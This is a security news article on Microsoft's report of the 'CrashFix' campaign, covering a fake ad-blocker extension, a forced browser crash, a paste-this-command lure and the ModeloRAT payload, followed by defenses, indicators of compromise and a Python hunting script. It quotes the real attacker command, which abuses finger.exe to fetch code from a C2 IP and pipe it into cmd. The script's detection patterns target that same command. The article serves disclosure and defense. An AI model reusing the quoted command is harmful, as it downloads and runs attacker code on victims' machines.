June 21, 2026

PBX Science

VoIP & PBX, Networking, DIY, Computers.

Microsoft Warns of Sophisticated New Malware Campaign Targeting Enterprise Users


February 9, 2026 — In a stark reminder of the rapidly evolving cybersecurity threat landscape, Microsoft has identified a dangerous new variant of social engineering attacks that deliberately crashes users’ browsers before tricking them into installing malware.

Dubbed “CrashFix,” this sophisticated campaign represents a significant escalation in tactics that exploit human psychology rather than technical vulnerabilities.


The Growing Threat of ClickFix and Its Variants

CrashFix is the latest evolution in a family of social engineering techniques collectively known as ClickFix, which has seen explosive growth over the past year. According to Microsoft’s analysis, ClickFix attacks have surged by 517% between 2024 and 2025, with the technique now accounting for 47% of all observed initial access attacks. This dramatic increase reflects a fundamental shift in how cybercriminals are approaching system compromise—moving away from traditional exploit-based attacks toward manipulating users into compromising their own systems.

“Defending against the ClickFix technique is uniquely challenging because the attack chain is built almost entirely on legitimate user actions and the abuse of trusted system tools,” explained Martin Zugec, technical solutions director at Bitdefender. “Unlike traditional malware, ClickFix turns the user into the initial access vector, making the attack look benign from an endpoint defense perspective.”



How CrashFix Works: A Multi-Stage Attack

Stage 1: The Deceptive Entry Point

The CrashFix campaign identified by Microsoft Defender Experts in January 2026 begins with what appears to be a legitimate security tool. In documented cases, victims searching for ad-blocking software were served malicious advertisements leading them to install a Chrome extension called “NexShield Advanced Web Protection.”

NexShield is a near-perfect clone of the legitimate uBlock Origin Lite extension, complete with forged headers falsely crediting the original developer, Raymond Hill. The malicious extension was distributed through the official Chrome Web Store, lending it an air of legitimacy that would cause most users to trust it implicitly.

Stage 2: Deliberate Browser Crash

Once installed, NexShield’s true purpose becomes clear. The extension contains code that performs a denial-of-service attack against the user’s own browser by rapidly opening numerous Chrome runtime ports in a tight loop. This exhausts CPU and memory resources until the browser becomes unresponsive or crashes entirely.

This intentional crash is what distinguishes CrashFix from earlier ClickFix variants. Rather than simply presenting a fake error message, CrashFix creates a real problem that the user experiences firsthand, making the subsequent “solution” far more convincing.

Stage 3: The Fake Fix

When frustrated users force-quit and restart their browser, the extension springs its trap. A 400×600 pixel pop-up window appears displaying a professional-looking “CrashFix” security warning, claiming the browser crashed unexpectedly and urgently needs a scan to prevent future issues.

The pop-up implements multiple anti-analysis techniques to prevent users from discovering its true nature:

  • Blocking keyboard shortcuts for developer tools
  • Disabling right-click context menus
  • Preventing text selection
  • Creating a sense of urgency through warning messages

Stage 4: Malicious Command Execution

If users follow the instructions to “run a scan,” they’re told to open the Windows Run dialog (Win+R) and press Ctrl+V to paste what they believe is a repair command. Unbeknownst to them, the extension has already copied a malicious PowerShell command to their clipboard.

The command executes a sophisticated multi-stage payload:

cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98[.]108|cmd."

This command leverages a legitimate Windows utility called finger.exe—originally designed to retrieve user information from remote systems—as a “living-off-the-land” binary to avoid detection. The utility is copied to a temporary directory and renamed to ct.exe before being used to download and execute the final payload.


ModeloRAT: The Ultimate Payload

For systems that are domain-joined (indicating corporate or enterprise environments), CrashFix deploys a sophisticated Python-based remote access trojan called ModeloRAT. This malware is specifically designed to target high-value business networks rather than home users.

ModeloRAT’s capabilities include:

System Reconnaissance: Scanning for over 50 different security and analysis tools, including Wireshark, Process Hacker, WinDbg, and x64dbg. If it detects these tools, it may alter its behavior or send fake responses to waste researchers’ time.

Persistence Mechanisms: Creating Windows Registry entries to ensure automatic execution at system startup. The malware disguises itself using names that mimic legitimate applications like “Spotify47” or “Adobe2841.”

Advanced Communication: Using RC4 encryption for command-and-control (C2) communications with periodic beacon requests to remote servers.

Anti-Analysis Techniques:

  • Fingerprinting to detect virtual machines and sandboxes
  • Checking for common researcher usernames like “John Doe”
  • Using typosquatting domains that closely resemble legitimate Google domains to hide malicious traffic
  • Multi-layered payload obfuscation and delayed execution

Targeted Data Collection: Gathering domain, user, and network information to assess the value of compromised systems. If the system is part of an enterprise network with access to Active Directory and sensitive resources, additional backdoors are deployed.


The Broader ClickFix Threat Landscape

CrashFix is part of a larger family of social engineering attacks that have been rapidly evolving:

FileFix

Discovered by security researcher mr.d0x, FileFix represents another variation that tricks users into pasting malicious commands into the Windows File Explorer address bar rather than the Run dialog. This approach appears even more benign to users, as interacting with File Explorer is a common, everyday action that rarely raises suspicion.

JackFix

Another variant that uses different psychological triggers to manipulate users into executing commands.

GlitchFix

Associated with the ErrTraffic traffic distribution system (TDS), GlitchFix causes compromised websites to appear glitchy before suggesting a “fix” to address the fabricated problem.

ClickFix Builders

The popularity of these techniques has spawned a malware-as-a-service ecosystem, with ClickFix builders advertised on hacker forums for $200 to $1,500 per month. These kits allow even less sophisticated attackers to deploy convincing social engineering campaigns.


The KongTuke Connection

The CrashFix campaign has been attributed to a threat actor known as KongTuke (also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124). This group operates a sophisticated traffic distribution system that profiles victim hosts before redirecting them to payload delivery sites.

KongTuke’s infrastructure has been leveraged by multiple cybercriminal organizations, including:

  • Rhysida ransomware group
  • Interlock ransomware operators
  • TA866 (Asylum Ambuscade)

The group has also been associated with deploying SocGholish and D3F@ck Loader malware in previous campaigns, demonstrating a pattern of collaboration with various ransomware and malware operators.


Platform Expansion: Beyond Windows

While CrashFix primarily targets Windows systems, Microsoft has observed the broader ClickFix technique expanding to other platforms. Since late 2025, macOS environments have been increasingly targeted through:

Deceptive Download Pages: Fake applications distributed through malicious Google Ads

Terminal Command Injection: Users tricked into copying and pasting commands into macOS Terminal

Specific macOS Stealers: Deployment of DigitStealer, MacSync, and Atomic macOS Stealer (AMOS)

Native Utility Abuse: Leveraging AppleScript automation and macOS utilities for fileless execution

These cross-platform campaigns harvest credentials, session data, browser passwords, cryptocurrency wallets, cloud credentials, and developer access keys.


Recent Related Threats

APT28 Exploits Microsoft Office Zero-Day

In a separate but equally concerning development, the Russian state-sponsored threat actor APT28 was observed exploiting a newly disclosed Microsoft Office vulnerability (CVE-2026-21509) just three days after its public disclosure. The campaign, dubbed Operation Neusploit, targeted users in Ukraine, Slovakia, and Romania.

The vulnerability allows attackers to send specially crafted Office files that establish WebDAV connections to external resources, leading to the deployment of the COVENANT framework’s Grunt implant. This rapid weaponization demonstrates how quickly sophisticated threat actors can adapt to newly disclosed vulnerabilities.

WhatsApp Platform Abuse

During November 2025, Microsoft identified a campaign leveraging WhatsApp for multi-stage infection and worm-like propagation to distribute the Eternidade Stealer. The attack begins with obfuscated Visual Basic scripts that drop malicious batch files, eventually launching PowerShell instances to download additional payloads.

This represents a growing trend of “platform abuse,” where adversaries exploit the legitimacy and user trust associated with widely used applications and services to distribute malware.


Defense Strategies and Mitigation

Microsoft and cybersecurity experts recommend a multi-layered approach to defending against CrashFix and similar social engineering attacks:

Technical Controls

  1. Enable Cloud-Based Protection: Activate Microsoft Defender’s cloud protection and EDR block mode for real-time threat detection and response.

  2. Restrict Legacy Utilities: Limit or monitor the use of legacy Windows utilities like finger.exe that can be abused by attackers. Consider blocking data transmission through these tools using Group Policy.

  3. Attack Surface Reduction Rules: Implement rules that block executable files from running unless they meet prevalence, age, or trusted list criteria.

  4. SmartScreen Protection: Ensure Microsoft SmartScreen is enabled in browsers to identify and block malicious websites, phishing sites, and malware hosts.

  5. Browser Extension Controls: Implement policies that restrict which browser extensions can be installed, and regularly audit installed extensions for suspicious behavior.

  6. Command Execution Restrictions: For users who don’t require PowerShell or command-line access in their daily work, consider restricting access to the Run dialog, PowerShell, and Command Prompt through Group Policy.

Authentication and Access

  1. Multi-Factor Authentication (MFA): Enforce MFA on all accounts without exceptions. Require MFA from all devices, in all locations, at all times.

  2. Least Privilege Access: Remove unnecessary administrative rights and implement role-based access controls to limit the damage from compromised accounts.

  3. Credential Management: Implement policies preventing employees from storing enterprise credentials in browsers or password vaults secured with personal credentials. Organizations can disable password syncing in browsers on managed devices using Group Policy.

User Education and Awareness

  1. Targeted Training: Conduct specific training sessions that replicate CrashFix and FileFix scenarios to build user resilience and recognition.

  2. Warning Signs Education: Teach users to recognize red flags:

    • Unexpected prompts to copy and paste commands
    • Instructions to open Run dialog or PowerShell
    • Browser crashes followed immediately by “fix” instructions
    • Requests to install extensions from unfamiliar sources

  3. Reporting Mechanisms: Establish clear procedures for users to report suspicious activities to security teams without fear of repercussion.

  4. Regular Phishing Simulations: Conduct ongoing phishing exercises that specifically test resistance to social engineering tactics like ClickFix.

Monitoring and Response

  1. Behavioral Analytics: Deploy endpoint detection solutions that monitor for suspicious behaviors such as unusual clipboard manipulation or PowerShell command execution initiated by user interactions.

  2. Network Monitoring: Implement comprehensive logging and monitoring across endpoints, browsers, and networks to enable rapid detection and containment of attempted intrusions.

  3. Threat Hunting: Conduct proactive threat hunting exercises looking for indicators of ClickFix variants, such as:

    • Unusual browser extension installations
    • Execution of renamed Windows utilities
    • Suspicious PowerShell command patterns
    • Connections to known malicious domains

The Future of Social Engineering Attacks

The emergence of CrashFix and its variants represents a concerning evolution in cybersecurity threats. By creating real technical problems that users experience firsthand before offering malicious “solutions,” attackers have found a way to significantly increase the credibility and success rate of their social engineering campaigns.

The shift from exploiting technical vulnerabilities to exploiting human behavior and trust makes these attacks particularly challenging to defend against with traditional security tools. As one Microsoft researcher noted, “Threat actors are increasingly abusing trusted user actions and native operating system utilities to bypass traditional defenses, making behavior-based detection and user awareness critical.”

Organizations must adapt their security strategies accordingly, placing greater emphasis on user education, behavioral monitoring, and the principle of least privilege. The days when security could rely primarily on perimeter defenses and signature-based detection are definitively over.



Conclusion

The CrashFix campaign serves as a wake-up call for organizations worldwide. With a 517% increase in ClickFix-style attacks and new variants emerging regularly, the threat landscape is evolving faster than many security teams can adapt. The combination of sophisticated social engineering, abuse of legitimate system tools, and targeted deployment against high-value corporate networks makes these attacks particularly dangerous.

Success in defending against these threats requires a fundamental shift in how organizations approach security—moving beyond technical controls to build a security culture where users are genuinely equipped to recognize and resist manipulation attempts. Combined with robust technical defenses, comprehensive monitoring, and rapid incident response capabilities, organizations can build resilience against this new generation of social engineering attacks.

The message is clear: in the modern threat landscape, your users are both your greatest vulnerability and your most important line of defense. Investing in their awareness and education is no longer optional—it’s essential for survival.


Key Indicators of Compromise (IOCs)

Organizations should monitor for the following indicators:

Malicious Extension:

  • Extension ID: cpcdkmjddocikjdkbbeiaafnpdbdafmi
  • Developer Email: alaynna6899@gmail.com
  • Name: NexShield Advanced Web Protection

File Hashes:

  • ct.exe (renamed finger.exe): SHA-256: beb0229043741a7c7bfbb4f39d00f583e37ea378d11ed3302d0a2bc30f267006

Malicious Domains:

  • 199.217.98[.]108 (C2 infrastructure)
  • Various typosquatting domains mimicking Google services

Behavioral Indicators:

  • Rapid creation of Chrome runtime ports
  • Unexpected browser crashes followed by security warnings
  • Execution of finger.exe from unusual locations
  • PowerShell execution originating from browser processes
  • Suspicious clipboard activity
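A small hunting script that turns the threat-hunting items above (execution of renamed Windows utilities, suspicious command patterns) and the behavioral indicators just listed (finger.exe running from an unusual location, a shell spawned from a browser process) into checks over process-creation telemetry. It is an added example, not code from Microsoft or this site; the Sysmon-style records, the documentation address 192.0.2.10 standing in for the C2 host, and the rule names are all assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation (Event ID 1) records; not real telemetry.
# 192.0.2.10 is a documentation address standing in for the campaign's C2 host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Temp\ct.exe", "OriginalFileName": "finger.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\ct.exe confirm@192.0.2.10",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r'cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@192.0.2.10|cmd"',
     "ParentImage": r"C:\Windows\explorer.exe"},  # a Win+R launch shows explorer.exe as parent
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -w hidden -enc SQBFAFgA",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"Image": r"C:\Windows\System32\finger.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "finger alice@printserver",  # benign: expected path, output not piped into cmd
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

WATCHED_LOLBINS = {"finger.exe"}  # add other legacy utilities you choose to watch
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
FINGER_PIPE = re.compile(r"\S+@[\w.\-\[\]]+\s*\|\s*cmd\b", re.I)   # "<user>@<host> | cmd"
FINGER_COPY = re.compile(r"copy\s+\S*finger\.exe\s+%temp%", re.I)  # staging finger.exe into %temp%

def renamed_lolbin(ev):
    """Version-info name is a watched utility, but it runs renamed or outside System32."""
    orig, img = ev["OriginalFileName"].lower(), ev["Image"].lower()
    return orig in WATCHED_LOLBINS and (ntpath.basename(img) != orig or not img.startswith(SYSTEM_DIRS))

def finger_lolbin_cmdline(ev):
    """Command line stages finger.exe or pipes its output straight into a command interpreter."""
    return bool(FINGER_PIPE.search(ev["CommandLine"]) or FINGER_COPY.search(ev["CommandLine"]))

def shell_from_browser(ev):
    """A command interpreter spawned directly by a browser process."""
    return (ntpath.basename(ev["Image"]).lower() in SHELLS
            and ntpath.basename(ev["ParentImage"]).lower() in BROWSERS)

RULES = (renamed_lolbin, finger_lolbin_cmdline, shell_from_browser)

def hunt(events):
    """Map each event index to the names of the rules it trips; untriggered events are omitted."""
    hits = {}
    for i, ev in enumerate(events):
        names = [rule.__name__ for rule in RULES if rule(ev)]
        if names:
            hits[i] = names
    return hits
```

Running `hunt(SAMPLE_EVENTS)` flags the first three records and leaves the legitimate finger.exe invocation alone; feed it real Sysmon or EDR process-creation events exported to the same field names.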

For the latest threat intelligence and security updates, organizations should subscribe to Microsoft Security Blog and regularly review security advisories from their endpoint protection vendors.
